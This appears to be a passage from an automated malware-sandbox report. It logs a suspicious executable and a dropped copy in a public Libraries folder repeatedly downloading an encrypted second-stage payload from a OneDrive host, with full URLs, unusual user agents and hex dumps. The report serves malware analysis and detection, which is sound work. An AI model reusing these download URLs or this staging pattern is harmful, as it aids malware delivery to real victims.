                                        2021-09-22 18:59:44 UTC752INData Raw: 52 fc 88 a8 37 a0 52 fc 39 b6 35 43 23 37 98 3a cf 26 a3 71 e3 5b 9b a9 56 7f 3d 6e 50 a8 41 6e cb 4d f3 29 a2 66 a5 1e e5 1f 96 67 3b aa 48 34 4a a6 ec 00 c0 30 e3 e1 e4 be 10 a2 70 ac 38 35 13 cb 63 a8 ff d7 dd 13 f8 df b7 1a af 56 06 d6 34 b5 83 d5 ad 1f ec 63 23 da a7 f7 60 f6 e2 1b 7f 3e 52 f3 69 4f f7 32 36 92 d8 74 8d 88 79 d0 d4 42 b9 3d 0e 30 44 b1 d9 51 c5 f5 1b 5e 94 6b fc ff 65 b8 b2 2b 35 c8 c2 7c 95 9f e2 0e be 65 a4 f3 69 4a 0f 22 81 01 2d cd df 3b b8 e1 fb 8a 71 67 b1 e0 39 09 c4 d4 12 fc 61 dd b0 3b 4b 05 a4 49 90 75 c7 ff 7d ea 3a ce 1d 72 ca 1a f4 66 c5 69 c7 02 54 07 df bf 0c eb da 59 6d b2 a9 c2 07 54 dd 39 1a db 56 cf 17 ee dc 65 6c b0 13 a4 53 0e 35 1d 17 53 7a 52 88 85 b7 d4 f9 ba 6c 6b eb 48 2b a6 e3 40 24 61 ea a7 69 b2 a1 c7 c7
                                        Data Ascii: R7R95C#7:&q[V=nPAnM)fg;H4J0p85cV4c#`>RiO26tyB=0DQ^ke+5|eiJ"-;qg9a;KIu}:rfiTYmT9VelS5SzRlkH+@$ai
                                        2021-09-22 18:59:44 UTC768INData Raw: 35 af 3d c9 a9 75 ce 11 b5 4a e5 b6 b8 95 65 cd eb 90 f9 88 17 6b cb ff af 07 d0 19 06 1c bc 2a 3b 50 fe 09 86 07 ac a6 d6 60 26 a3 34 c1 34 f1 52 03 97 28 f3 96 f9 8a 09 90 e3 cc 7f 80 37 2c d5 c2 96 f1 ac a2 c5 10 3a 9a b5 5c 18 c5 4f ec 27 4b 16 f4 17 6b ca 7b b9 34 a5 5d f8 0c 0c 18 e1 cf fa 38 9e bc ea 4f 7c 5a 14 3b 41 4a f1 de 34 c0 f3 e2 3d 55 89 f5 e7 89 a1 53 85 b3 0e 26 a3 75 96 a3 34 80 3e fb f4 25 78 4a f1 9e 92 1e 91 4c cd fb f4 24 a0 85 f2 20 ab 71 c6 40 e5 f4 64 6b e0 d5 a1 6f fc 56 0b a9 71 de 34 c1 75 c3 79 99 2f 40 db ae cc 0d ec 53 85 f2 60 21 18 84 70 05 ea df b7 1e a0 c9 86 74 4d 78 56 4a c1 90 8a 3c e2 69 b5 1b 86 74 4d 78 56 0b e8 4a f9 ef 98 ab 9c e2 3d 55 89 fb f4 64 ea 4f 7c 5e 1d 0f f0 5c 18 84 70 44 e5 c4 bd 5c d5 a1 6e 70 87
                                        Data Ascii: 5=uJek*;P`&44R(7,:\O'Kk{4]8O|Z;AJ4=US&u4>%xJL$ q@dkoVq4uy/@S`!ptMxVJ<itMxVJ=UdO|^\pD\np
                                        2021-09-22 18:59:44 UTC784INData Raw: cf 7c 5e 5d 68 bf c9 86 34 2d c2 4d 2d 32 f8 5a a8 1d 56 f4 9b dd fd 10 73 8b 0c ee ef d9 e9 20 65 16 d5 a1 6a 00 e8 e9 95 ea b0 2f 53 6d be ae 3f 25 98 9b 62 ca f9 55 dc 30 fd cf 20 36 9c 5b 69 4a 8a 95 15 bd 9f 5f 27 25 60 cd 6b 03 83 ee 12 40 6b 1a d1 67 4f 83 7f 0d ec 13 0a 09 5b 96 d7 49 8b 45 33 3f 1c ba 4a 52 5a eb 2e 4b d4 f7 eb 91 ff a4 0e 6e 00 bc 5e a7 69 49 2a 22 65 53 fe 84 98 9b 62 d5 e9 a4 e7 24 15 a8 2e 77 8e df ec 0d 10 36 4e 06 00 d9 aa b6 dd 4e 87 75 33 7a d3 63 57 f2 49 87 a6 46 a8 35 4b 36 4e ac de 40 db 52 7b 5f 97 5c 93 ed 88 f0 ac 4c 2c 3b 06 0e 3f b5 d0 43 a2 3a ce 54 40 d3 b9 9b e2 b6 dd f7 ac cb ae 33 ff 77 d3 d9 ee 47 4e 05 1b 80 67 f5 a0 b9 41 a1 bf 71 d6 e1 e6 1f 48 2e 3f a9 aa 3c 2c e2 02 bd af b1 ad 10 7e 8b 03 93 9c a4 f6
                                        Data Ascii: |^]h4-M-2ZVs ej/Sm?%bU0 6[iJ_'%`k@kgO[IE3?JRZ.Kn^iI*"eSb$.w6NNu3zcWIF5K6N@R{_\L,;?C:T@3wGNgAqH.?<,~
                                        2021-09-22 18:59:44 UTC800INData Raw: 2c c4 34 3f 43 16 c4 d0 c9 a2 4e c4 b8 6b 90 61 a3 34 c1 74 f2 bb 5b 66 a5 6f 94 c0 63 6b e2 63 f7 b1 91 87 f7 58 17 fd fc 03 f2 64 10 8c 87 b2 5e 1a 03 d9 d5 a6 81 16 7f 7e 6c d3 5a 9f d4 e0 c7 24 76 97 92 59 19 dd 81 19 8d f9 64 0e 62 ae 9d 71 90 d9 a9 01 5f 5c 45 3f 00 0b b6 82 a8 35 b3 bd 93 ee c6 b2 3d 96 68 cc 95 95 fd 00 15 70 44 a4 07 a3 5c 08 e8 2e ed 8c db 6e 73 ca ba e0 38 35 bc 71 9f c3 be 65 a7 49 af cb 74 b2 03 ae 24 59 19 fe 2f bd 93 ee ca c7 6a cb ce 9a b6 56 c3 f2 9f d4 84 0a 8d c4 77 83 16 c5 f3 1d f0 a3 21 f0 a0 e8 c1 a3 bf 4b 07 20 10 a8 8d 23 95 71 f6 96 f3 e2 7d 50 8b 97 4c 36 f6 95 50 77 21 93 e8 c1 8d 5e 94 48 de 63 fe 29 d1 5c 9b ce 9a f5 e7 88 f4 64 2e 76 0c 8f 83 b5 05 84 87 b3 dc 31 cc 48 2b 1d 86 12 8f 4d f3 fa f8 91 49 e4 43
                                        Data Ascii: ,4?CNka4t[fockcXd^~lZ$vYdbq_\E?5=hpD\.ns85qeIt$Y/jVw!K #q}PL6Pw!^Hc)\d.v1H+MIC
                                        2021-09-22 18:59:44 UTC816INData Raw: a3 bf 71 83 a8 de 11 0a a5 b3 56 4e bc 8e a3 cb 4b f8 6d fb b2 bc cf 6b 79 53 85 b7 19 6a 12 88 b9 ef d9 ec 15 8d 26 5c d8 ac c7 c7 c4 88 5c e7 08 ea 4f 39 0a 1d 2a 54 c7 09 e3 fa 37 34 e4 be 2e 3f 59 d7 e3 3f 7c a1 ef 52 03 93 57 0a 40 24 5e 96 97 5c 5e 95 30 47 ab ce 11 b0 96 1b 2e 4b b3 dd b2 91 4a 61 86 8b 3f d2 1a cd c9 12 52 fc b6 56 0b ad 0f 68 16 7f 25 ab 45 23 5a 88 5c e7 08 ea 4f 39 0a c5 5b 69 75 44 e4 04 1e 35 66 d1 58 9b 22 df f1 76 74 b2 14 f0 5c 5d dd 1e b4 26 63 23 1c c8 42 50 db 51 40 50 fe 3f 1f a7 19 f9 2f bd 6c 7e 25 98 be 11 35 c8 04 1d 49 d3 b9 9b e2 b6 dd f7 ad 89 de cb 4b f8 6d fb b2 10 56 f4 a4 3d 55 cc 4b bb 4d 87 36 4e fa 34 87 3a eb 2e 74 c6 00 15 bb b8 c4 03 16 0b e8 0f b6 35 66 d1 58 9b 22 df f1 3e f2 9f eb 5a 14 3e 91 d8 02
                                        Data Ascii: qVNKmkySj&\\O9*T74.?Y?|RW@$^\^0G.KJa?RVh%E#Z\O9[iuD5fX"vt\]&c#BPQ@P?/l~%5IKmV=UKM6N4:.t5fX">Z>
                                        2021-09-22 18:59:44 UTC832INData Raw: db ae cc 11 2c 58 d6 a8 ee 57 8e 9c 45 8e 40 50 fe 3a e1 5f 87 b5 9c a4 b6 dd 32 b5 18 43 64 69 3c b5 5b d3 8c b9 c4 3c e0 ee e7 cc 4e 3d 33 2b 6e c9 86 74 4c ba 65 21 18 84 73 db 46 e8 4a f0 10 c9 4f 4f bf fa a9 ca fb 7f b3 05 18 59 79 27 da cc f2 88 ae 7c 5a 52 c4 9a 4a 1a 88 79 d8 4e 42 37 f8 69 f3 25 46 17 fd 18 fb 1c bb 97 da 72 89 ca 09 a3 1b 73 eb 97 de 33 4a f3 1a 0b f8 19 c6 85 0d 13 19 ac 2f 00 af 59 e6 91 bd 68 4d f9 89 fd 71 ff 88 86 8c 02 ab ba 06 8d eb 24 f4 66 c5 8a 17 06 28 a7 79 eb 31 c5 ff f2 8b 09 89 ff 88 ae 7e 67 ce 90 ec 47 2d bb 68 73 e4 35 67 f6 ae cc 0d ec d3 94 d5 66 2e b4 d8 6b 3f d4 22 71 b0 a5 70 bb 97 f8 46 00 66 d1 98 9b 22 1a 0c 65 ec ac 38 2b 6c d3 aa 3c 83 3e fe 7a 30 ba 8c 6e ab 05 d8 53 8b ff fc 77 9f 2d 8e 06 36 b6 0d
                                        Data Ascii: ,XWE@P:_2Cdi<[<N=3+ntLe!sFJOOYy'|ZRJyNB7i%Frs3J/YhMq$f(y1~gG-hs5gf.k?"qpFf"e8+l<>z0nSw-6


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        2192.168.2.44981740.79.207.82443C:\Users\user\Desktop\g4E1F7Lc2O.exe
                                        TimestampkBytes transferredDirectionData
                                        2021-09-22 19:00:43 UTC842OUTGET /y4m0xICa2FPeIWKBwiVht4HVgZjzq6LpzHUaJGDOXIHlp4vivbSfkbNqDw-sSDyEHvVJhVrvGVPd33MQ5HcP2SvyM6nlX6xDFoQditiEfVqQqMhE4Qc4N7yYrIrP_ac95EEJY4w_Tu44y8bkCBW_ZAx4xcJq_WAAcWyVvT0AZ3R3TAn9qo4vyG8ttwxtNnpVfUtIbduv9Mkg0VMIjOW8pgqVw/Bkmhwqlbkulnphubkhqeoycsyqhknoi?download&psid=1 HTTP/1.1
                                        User-Agent: zipo
                                        Host: qclcfg.sn.files.1drv.com
                                        Connection: Keep-Alive
                                        2021-09-22 19:00:43 UTC842INHTTP/1.1 200 OK
                                        Cache-Control: public
                                        Content-Length: 844288
                                        Content-Type: application/octet-stream
                                        Content-Location: https://qclcfg.sn.files.1drv.com/y4mWvQKn8A9-lLi8pDJ2mzIAfa341nW_80OcCKUuCUpg8nXLINV6nQIWQdhn8CExDNKcwSeNwu6BX-9xHYJYPpnCWo4AtPshwSIXRuz6OMttTSmhg4gKWmZNXtOqCqtZmBmi22CsfmkXoDNUcEFtTrxSdXRcmY5hfDdPUHwTDYWIxDixONCYp1MV3cNTMxcE4mg
                                        Expires: Tue, 21 Dec 2021 19:00:43 GMT
                                        Last-Modified: Wed, 22 Sep 2021 16:36:46 GMT
                                        Accept-Ranges: bytes
                                        P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                        X-MSNSERVER: SN4PPF3DE00C739
                                        Strict-Transport-Security: max-age=31536000; includeSubDomains
                                        MS-CV: dLBGW3PbCkGqSB7URRezfw.0
                                        X-SqlDataOrigin: S
                                        CTag: aYzpENjY3NkE5QTYxRTg0MUYzITE1Ny4yNTc
                                        Etag: D6676A9A61E841F3!157.2
                                        X-PreAuthInfo: rv;poba;
                                        Content-Disposition: attachment; filename="Bkmhwqlbkulnphubkhqeoycsyqhknoi"
                                        X-Content-Type-Options: nosniff
                                        X-StreamOrigin: X
                                        X-AsmVersion: UNKNOWN; 19.758.906.2003
                                        Date: Wed, 22 Sep 2021 19:00:43 GMT
                                        Connection: close
                                        2021-09-22 19:00:43 UTC843INData Raw: 04 19 56 53 dd f5 a9 08 25 64 6b e9 8b b1 1b 4f 38 8b af 16 d8 60 6f 8b bb 2c f1 8e 86 73 cb 8b fe 4e fa 70 44 e5 c4 bc ea 6f c2 f6 69 b7 5f 9f 2b 2b 2d 32 bc de 34 c0 f3 e3 bf 31 3b 70 44 e5 c4 fe 7a 5a 14 7e 63 a8 bf 45 66 2f 36 c4 fc 36 c5 5e 1d 0e 6e 42 e0 39 4c f2 60 21 19 32 bd 6d be ef d9 e9 cc 2d 32 bc ea 4d 78 56 0b eb d1 98 9a 94 93 10 73 ca 09 a3 34 e1 bb 69 b5 59 92 8e 86 76 51 80 66 1a 88 78 56 0a 65 ec 53 a5 38 cb 8b fd f8 6d be ef d9 a9 40 ef d9 a8 be ef d9 e9 cc 2d 32 bc ea 4d 78 56 5b f6 0f 91 63 f8 3f 0a 03 b2 86 27 4a a3 04 68 6b ee 0e 3b 7f b1 01 80 08 44 d4 2f 40 89 94 c3 5c 32 d9 c6 54 5f c8 5d f4 34 93 42 86 10 21 4b 1c df 87 c6 58 47 32 e8 65 f8 3e 85 9d 03 e6 76 27 77 bc ba c3 53 e1 d4 4b 2b 7a 03 b6 b2 84 22 c9 e0 5d c9 d5 ce 43
                                        Data Ascii: VS%dkO8`o,sNpDoi_++-241;pDzZ~cEf/66^nB9L`!2m-2MxVs4iYvQfxVeS8m@-2MxV[c?'Jhk;D/@\2T_]4B!KXG2e>v'wSK+z"]C


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        3192.168.2.44982040.79.207.82443C:\Users\user\Desktop\g4E1F7Lc2O.exe
                                        TimestampkBytes transferredDirectionData
                                        2021-09-22 19:00:45 UTC858OUTGET /y4m8yDreFSlMe8bH8Lwd6-50vUmg410-SwSSkigrGueMOAK6vuIcnI70W5Md0Twh3cJHnULU0HiRh-PYsljo5lnqZQ8qZOOWXyBsoFiToXjig3LjJKT1uAnM4DtrAl_czQgTOwCX9PrYAyhISl2Fn91pHYn5jrQb546YqDoVqX62x895dNsKCdnUm7beVR-2GTCGJe71pBq5IyId2FgNqaKnQ/Bkmhwqlbkulnphubkhqeoycsyqhknoi?download&psid=1 HTTP/1.1
                                        User-Agent: zipo
                                        Host: qclcfg.sn.files.1drv.com
                                        Connection: Keep-Alive
                                        2021-09-22 19:00:53 UTC875INHTTP/1.1 200 OK
                                        Cache-Control: public
                                        Content-Length: 844288
                                        Content-Type: application/octet-stream
                                        Content-Location: https://qclcfg.sn.files.1drv.com/y4mWvQKn8A9-lLi8pDJ2mzIAfa341nW_80OcCKUuCUpg8nXLINV6nQIWQdhn8CExDNKcwSeNwu6BX-9xHYJYPpnCWo4AtPshwSIXRuz6OMttTSmhg4gKWmZNXtOqCqtZmBmi22CsfmkXoDNUcEFtTrxSdXRcmY5hfDdPUHwTDYWIxDixONCYp1MV3cNTMxcE4mg
                                        Expires: Tue, 21 Dec 2021 19:00:53 GMT
                                        Last-Modified: Wed, 22 Sep 2021 16:36:46 GMT
                                        Accept-Ranges: bytes
                                        P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                        X-MSNSERVER: SN4PPF829241557
                                        Strict-Transport-Security: max-age=31536000; includeSubDomains
                                        MS-CV: yDwaJGr7N0qu0nD/wB6vwg.0
                                        X-SqlDataOrigin: S
                                        CTag: aYzpENjY3NkE5QTYxRTg0MUYzITE1Ny4yNTc
                                        Etag: D6676A9A61E841F3!157.2
                                        X-PreAuthInfo: rv;poba;
                                        Content-Disposition: attachment; filename="Bkmhwqlbkulnphubkhqeoycsyqhknoi"
                                        X-Content-Type-Options: nosniff
                                        X-StreamOrigin: X
                                        X-AsmVersion: UNKNOWN; 19.758.906.2003
                                        Date: Wed, 22 Sep 2021 19:00:53 GMT
                                        Connection: close
                                        2021-09-22 19:00:53 UTC876INData Raw: 04 19 56 53 dd f5 a9 08 25 64 6b e9 8b b1 1b 4f 38 8b af 16 d8 60 6f 8b bb 2c f1 8e 86 73 cb 8b fe 4e fa 70 44 e5 c4 bc ea 6f c2 f6 69 b7 5f 9f 2b 2b 2d 32 bc de 34 c0 f3 e3 bf 31 3b 70 44 e5 c4 fe 7a 5a 14 7e 63 a8 bf 45 66 2f 36 c4 fc 36 c5 5e 1d 0e 6e 42 e0 39 4c f2 60 21 19 32 bd 6d be ef d9 e9 cc 2d 32 bc ea 4d 78 56 0b eb d1 98 9a 94 93 10 73 ca 09 a3 34 e1 bb 69 b5 59 92 8e 86 76 51 80 66 1a 88 78 56 0a 65 ec 53 a5 38 cb 8b fd f8 6d be ef d9 a9 40 ef d9 a8 be ef d9 e9 cc 2d 32 bc ea 4d 78 56 5b f6 0f 91 63 f8 3f 0a 03 b2 86 27 4a a3 04 68 6b ee 0e 3b 7f b1 01 80 08 44 d4 2f 40 89 94 c3 5c 32 d9 c6 54 5f c8 5d f4 34 93 42 86 10 21 4b 1c df 87 c6 58 47 32 e8 65 f8 3e 85 9d 03 e6 76 27 77 bc ba c3 53 e1 d4 4b 2b 7a 03 b6 b2 84 22 c9 e0 5d c9 d5 ce 43
                                        Data Ascii: VS%dkO8`o,sNpDoi_++-241;pDzZ~cEf/66^nB9L`!2m-2MxVs4iYvQfxVeS8m@-2MxV[c?'Jhk;D/@\2T_]4B!KXG2e>v'wSK+z"]C


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        4192.168.2.44982240.79.207.80443C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exe
                                        TimestampkBytes transferredDirectionData
                                        2021-09-22 19:00:49 UTC858OUTGET /y4mRbmDsFAPLMwkG7lKvJMgSVtNsjr4ltCR3rwxB9MbuFMvkFbdugz3VkrPF6JHEOQjdf1gbwNsmeTew5aBzWEoZ_UUhrtF4cvO0Cy53-UiMu3gc94jsjRZTaQMKMstCGG5ctMtuiFqol2YibfgQivz5qCVOpMFSPRaO4_YtkHijee0swhbUFmx9nPDDBiDGkp_y0eWq5zQ7iQA5M2nHJs6eg/Bkmhwqlbkulnphubkhqeoycsyqhknoi?download&psid=1 HTTP/1.1
                                        User-Agent: zipo
                                        Host: qclcfg.sn.files.1drv.com
                                        Connection: Keep-Alive
                                        2021-09-22 19:00:50 UTC859INHTTP/1.1 200 OK
                                        Cache-Control: public
                                        Content-Length: 844288
                                        Content-Type: application/octet-stream
                                        Content-Location: https://qclcfg.sn.files.1drv.com/y4mWvQKn8A9-lLi8pDJ2mzIAfa341nW_80OcCKUuCUpg8nXLINV6nQIWQdhn8CExDNKcwSeNwu6BX-9xHYJYPpnCWo4AtPshwSIXRuz6OMttTSmhg4gKWmZNXtOqCqtZmBmi22CsfmkXoDNUcEFtTrxSdXRcmY5hfDdPUHwTDYWIxDixONCYp1MV3cNTMxcE4mg
                                        Expires: Tue, 21 Dec 2021 19:00:50 GMT
                                        Last-Modified: Wed, 22 Sep 2021 16:36:46 GMT
                                        Accept-Ranges: bytes
                                        P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                        X-MSNSERVER: SN4PPF33E143135
                                        Strict-Transport-Security: max-age=31536000; includeSubDomains
                                        MS-CV: t/m58Q0X5Eq8/PmWDT/DVg.0
                                        X-SqlDataOrigin: S
                                        CTag: aYzpENjY3NkE5QTYxRTg0MUYzITE1Ny4yNTc
                                        Etag: D6676A9A61E841F3!157.2
                                        X-PreAuthInfo: rv;poba;
                                        Content-Disposition: attachment; filename="Bkmhwqlbkulnphubkhqeoycsyqhknoi"
                                        X-Content-Type-Options: nosniff
                                        X-StreamOrigin: X
                                        X-AsmVersion: UNKNOWN; 19.758.906.2003
                                        Date: Wed, 22 Sep 2021 19:00:49 GMT
                                        Connection: close
                                        2021-09-22 19:00:50 UTC860INData Raw: 04 19 56 53 dd f5 a9 08 25 64 6b e9 8b b1 1b 4f 38 8b af 16 d8 60 6f 8b bb 2c f1 8e 86 73 cb 8b fe 4e fa 70 44 e5 c4 bc ea 6f c2 f6 69 b7 5f 9f 2b 2b 2d 32 bc de 34 c0 f3 e3 bf 31 3b 70 44 e5 c4 fe 7a 5a 14 7e 63 a8 bf 45 66 2f 36 c4 fc 36 c5 5e 1d 0e 6e 42 e0 39 4c f2 60 21 19 32 bd 6d be ef d9 e9 cc 2d 32 bc ea 4d 78 56 0b eb d1 98 9a 94 93 10 73 ca 09 a3 34 e1 bb 69 b5 59 92 8e 86 76 51 80 66 1a 88 78 56 0a 65 ec 53 a5 38 cb 8b fd f8 6d be ef d9 a9 40 ef d9 a8 be ef d9 e9 cc 2d 32 bc ea 4d 78 56 5b f6 0f 91 63 f8 3f 0a 03 b2 86 27 4a a3 04 68 6b ee 0e 3b 7f b1 01 80 08 44 d4 2f 40 89 94 c3 5c 32 d9 c6 54 5f c8 5d f4 34 93 42 86 10 21 4b 1c df 87 c6 58 47 32 e8 65 f8 3e 85 9d 03 e6 76 27 77 bc ba c3 53 e1 d4 4b 2b 7a 03 b6 b2 84 22 c9 e0 5d c9 d5 ce 43
                                        Data Ascii: VS%dkO8`o,sNpDoi_++-241;pDzZ~cEf/66^nB9L`!2m-2MxVs4iYvQfxVeS8m@-2MxV[c?'Jhk;D/@\2T_]4B!KXG2e>v'wSK+z"]C


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        5192.168.2.44982540.79.207.82443C:\Users\user\Desktop\g4E1F7Lc2O.exe
                                        TimestampkBytes transferredDirectionData
                                        2021-09-22 19:00:54 UTC891OUTGET /y4mpyA5pU3Kf_pjC6vc3DaDBL1qukGX88FVbJzbG-4ODOzUHoYLgFl9XwynneBAFD7G6Sn-Q7msbMnTVXZhDosESPPaWiTuetnYJy5bnKucZ954o3aqcIhCV9qT4DWdA8du81hF2m7lylwbq8oIYpSThnJTSLo0ur1z4CSYglycD241at-IzNZwiJkPHuTR0mG9ZZdPjNei_I_3Uud_L3Bc3g/Bkmhwqlbkulnphubkhqeoycsyqhknoi?download&psid=1 HTTP/1.1
                                        User-Agent: aswe
                                        Cache-Control: no-cache
                                        Host: qclcfg.sn.files.1drv.com
                                        Connection: Keep-Alive
                                        2021-09-22 19:00:55 UTC891INHTTP/1.1 200 OK
                                        Cache-Control: public
                                        Content-Length: 844288
                                        Content-Type: application/octet-stream
                                        Content-Location: https://qclcfg.sn.files.1drv.com/y4mWvQKn8A9-lLi8pDJ2mzIAfa341nW_80OcCKUuCUpg8nXLINV6nQIWQdhn8CExDNKcwSeNwu6BX-9xHYJYPpnCWo4AtPshwSIXRuz6OMttTSmhg4gKWmZNXtOqCqtZmBmi22CsfmkXoDNUcEFtTrxSdXRcmY5hfDdPUHwTDYWIxDixONCYp1MV3cNTMxcE4mg
                                        Expires: Tue, 21 Dec 2021 19:00:55 GMT
                                        Last-Modified: Wed, 22 Sep 2021 16:36:46 GMT
                                        Accept-Ranges: bytes
                                        P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                        X-MSNSERVER: SN4PPF285ED81A5
                                        Strict-Transport-Security: max-age=31536000; includeSubDomains
                                        MS-CV: +dWEkEj8PU+XJySlGyzCBA.0
                                        X-SqlDataOrigin: S
                                        CTag: aYzpENjY3NkE5QTYxRTg0MUYzITE1Ny4yNTc
                                        Etag: D6676A9A61E841F3!157.2
                                        X-PreAuthInfo: rv;poba;
                                        Content-Disposition: attachment; filename="Bkmhwqlbkulnphubkhqeoycsyqhknoi"
                                        X-Content-Type-Options: nosniff
                                        X-StreamOrigin: X
                                        X-AsmVersion: UNKNOWN; 19.758.906.2003
                                        Date: Wed, 22 Sep 2021 19:00:54 GMT
                                        Connection: close
                                        2021-09-22 19:00:55 UTC892INData Raw: 04 19 56 53 dd f5 a9 08 25 64 6b e9 8b b1 1b 4f 38 8b af 16 d8 60 6f 8b bb 2c f1 8e 86 73 cb 8b fe 4e fa 70 44 e5 c4 bc ea 6f c2 f6 69 b7 5f 9f 2b 2b 2d 32 bc de 34 c0 f3 e3 bf 31 3b 70 44 e5 c4 fe 7a 5a 14 7e 63 a8 bf 45 66 2f 36 c4 fc 36 c5 5e 1d 0e 6e 42 e0 39 4c f2 60 21 19 32 bd 6d be ef d9 e9 cc 2d 32 bc ea 4d 78 56 0b eb d1 98 9a 94 93 10 73 ca 09 a3 34 e1 bb 69 b5 59 92 8e 86 76 51 80 66 1a 88 78 56 0a 65 ec 53 a5 38 cb 8b fd f8 6d be ef d9 a9 40 ef d9 a8 be ef d9 e9 cc 2d 32 bc ea 4d 78 56 5b f6 0f 91 63 f8 3f 0a 03 b2 86 27 4a a3 04 68 6b ee 0e 3b 7f b1 01 80 08 44 d4 2f 40 89 94 c3 5c 32 d9 c6 54 5f c8 5d f4 34 93 42 86 10 21 4b 1c df 87 c6 58 47 32 e8 65 f8 3e 85 9d 03 e6 76 27 77 bc ba c3 53 e1 d4 4b 2b 7a 03 b6 b2 84 22 c9 e0 5d c9 d5 ce 43
                                        Data Ascii: VS%dkO8`o,sNpDoi_++-241;pDzZ~cEf/66^nB9L`!2m-2MxVs4iYvQfxVeS8m@-2MxV[c?'Jhk;D/@\2T_]4B!KXG2e>v'wSK+z"]C
                                        2021-09-22 19:00:55 UTC907INData Raw: 75 c3 17 0b f3 56 2e 46 7d bb ee 5f af 4d d0 ef 6a 77 1d 0d 5c 88 85 b4 3d d2 f3 10 c5 4f 49 c9 e0 28 6e 70 02 8c e5 af 7a 69 af 1f e7 01 5c 02 d2 cb d8 b0 10 31 56 ab 10 b4 bb fd 19 9e b9 e7 86 97 2a a7 77 a7 62 2d 58 31 f9 08 79 65 c3 3c 96 95 72 6b 2a c5 22 e6 4b 10 1d 1f 1c 0e 84 f1 f7 69 8d 0d e2 58 5b 06 94 a7 9d b7 95 30 be 1e 83 c5 9b 82 75 c3 df 39 49 7c 98 8d 57 c1 f7 b7 95 e5 17 87 4f 24 c0 f1 ec 6d f1 34 ed 85 ad 45 37 69 b3 40 af 99 1d f1 41 18 e3 b3 6b 1d e4 d9 19 9d d6 ff a6 74 a6 f6 6e cf ab 32 87 3c 65 b1 1a fd 20 f7 48 40 bb c9 bb 40 40 70 69 76 7a 2e 92 0d 27 da 06 2d fa 7b a2 e6 af e5 94 84 9a e6 25 c6 51 c2 16 09 89 f0 7e c9 f5 aa 2b 69 90 2e f4 28 a7 18 d9 c5 00 65 01 7c c3 50 14 9d 29 ee 82 91 71 93 48 23 29 57 20 b5 e1 51 6c cd 04
                                        Data Ascii: uV.F}_Mjw\=OI(npzi\1V*wb-X1ye<rk*"KiX[0u9I|WO$m4E7i@Aktn2<e H@@@pivz.'-{%Q~+i.(e|P)qH#)W Ql
                                        2021-09-22 19:00:55 UTC923INData Raw: 16 1f 9f 0f 59 4c 6a 92 81 3d 70 84 3a c7 15 38 d6 ce 08 7a f2 ed 06 7a 37 e3 1b c1 ef 44 83 4b 30 75 b9 09 b2 71 88 5f e6 c6 bc e9 f4 24 f8 80 97 29 c1 c3 55 77 28 07 bb ef 8e 5c 81 60 a4 f4 3c 0c 71 2c ce d9 ef 8e 3e 79 2e 22 53 e7 8a 6d b9 a8 59 75 6b 87 d8 40 4e a5 e0 2a 47 51 9e 1f f2 42 87 f1 0c 4b a4 c2 2c b7 7f c9 71 66 f6 86 af 7c 7b 4e 4e 6c 7d af 56 6d c5 cc ec 2c 47 ba 91 8a a9 8d 56 c4 9f 63 9c 33 b7 69 ab 4e 59 74 90 c7 68 60 00 01 6b 6b 04 e7 8a 53 15 3f 2c cf bb c4 9c 91 e6 d3 22 d9 67 02 6e 3d 17 07 22 b2 04 4a 2d 04 64 de 9e e6 f0 7c 0c 26 c8 97 1a f1 cc 7a e4 06 b4 ee f2 4c 88 f2 a9 ad ea 5d ea 65 ce a0 c8 4a 99 46 53 8b f3 ef 79 b7 a0 2c 1d 52 eb 14 15 aa 76 95 75 14 f7 40 91 e9 e8 22 59 84 77 d3 38 17 42 1c 3d c3 84 10 73 16 5e 9d 0c
                                        Data Ascii: YLj=p:8zz7DK0uq_$)Uw(\`<q,>y."SmYuk@N*GQBK,qf|{NNl}Vm,GVc3iNYth`kkS?,"gn="J-d|&zL]eJFSy,Rvu@"Yw8B=s^
                                        2021-09-22 19:00:55 UTC939INData Raw: 8a e1 fd 34 e1 16 1e 16 ac 7b 07 02 e2 90 03 f8 2b ff 9e 64 ae d4 7a 54 2d 8d 0d a2 5a d1 03 44 bd 88 55 7c 87 5d 09 b7 d9 6b 05 09 75 5c b0 96 b1 04 68 91 e3 60 14 d5 c3 f7 d6 2d 32 5a bc 59 28 97 8f 04 7b cd 42 51 77 76 02 2b 52 61 8d c8 a4 94 0c 65 50 4c f5 78 dd 7c e7 3e 05 55 97 d1 5c b8 73 65 37 f7 23 3e 40 6d 4e 2e 74 33 02 39 61 80 9f 50 07 65 e7 73 90 7e 2a 4e 65 d3 63 b7 20 4c 28 f9 6a c7 fa 3f 38 a5 c1 b7 70 ea db 49 16 b7 b1 cf ec 99 ab 34 99 ee 3a b0 4c b5 a8 02 66 10 ee 9e 82 69 63 73 41 42 ee ee 6a 48 ef a4 53 d1 13 85 69 59 4c 0e 87 20 79 f2 27 47 05 f8 72 c9 c5 65 fc e8 e6 56 1c e1 4b e4 e9 7e be 0c a8 2b 3d 7e 3e d3 56 c7 56 dc 81 cf 69 f1 a8 36 27 68 c2 38 9c ec be 2c 39 66 78 2e dc 4c 21 ea d9 6e 54 29 08 9a 07 07 64 6c 9e 92 df a5 cd
                                        Data Ascii: 4{+dzT-ZDU|]ku\h`-2ZY({BQwv+RaePLx|>U\se7#>@mN.t39aPes~*Nec L(j?8pI4:LficsABjHSiYL y'GreVK~+=~>VVi6'h8,9fx.L!nT)dl
